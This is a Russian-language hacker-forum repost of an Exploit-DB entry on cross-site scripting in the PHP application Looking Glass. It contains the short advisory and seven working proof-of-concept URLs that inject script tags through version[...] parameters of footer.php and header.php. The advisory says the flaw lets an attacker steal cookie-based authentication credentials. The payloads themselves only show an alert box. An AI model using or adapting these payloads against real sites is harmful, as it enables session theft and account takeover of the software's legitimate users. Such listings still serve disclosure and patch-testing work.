Exploit Looking Glass - Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26202
Проверка EDB
  1. Пройдено
Автор
RGOD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-08-27
Код:
source: https://www.securityfocus.com/bid/14680/info

Looking Glass is prone to a cross-site scripting vulnerability.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the software. Other attacks are also possible. 

http://www.example.com/[path]/footer.php?version[fullname]=</a><script>alert('lol')</script>
http://www.example.com/[path]/footer.php?version[homepage]="><script>alert('lol')</script>
http://www.example.com/[path]/footer.php?version[no]=<script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[fullname]=<script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[no]=</title><script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[author]=--><script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[email]=--><script>alert('lol')</script>
 
Источник
www.exploit-db.com

Похожие темы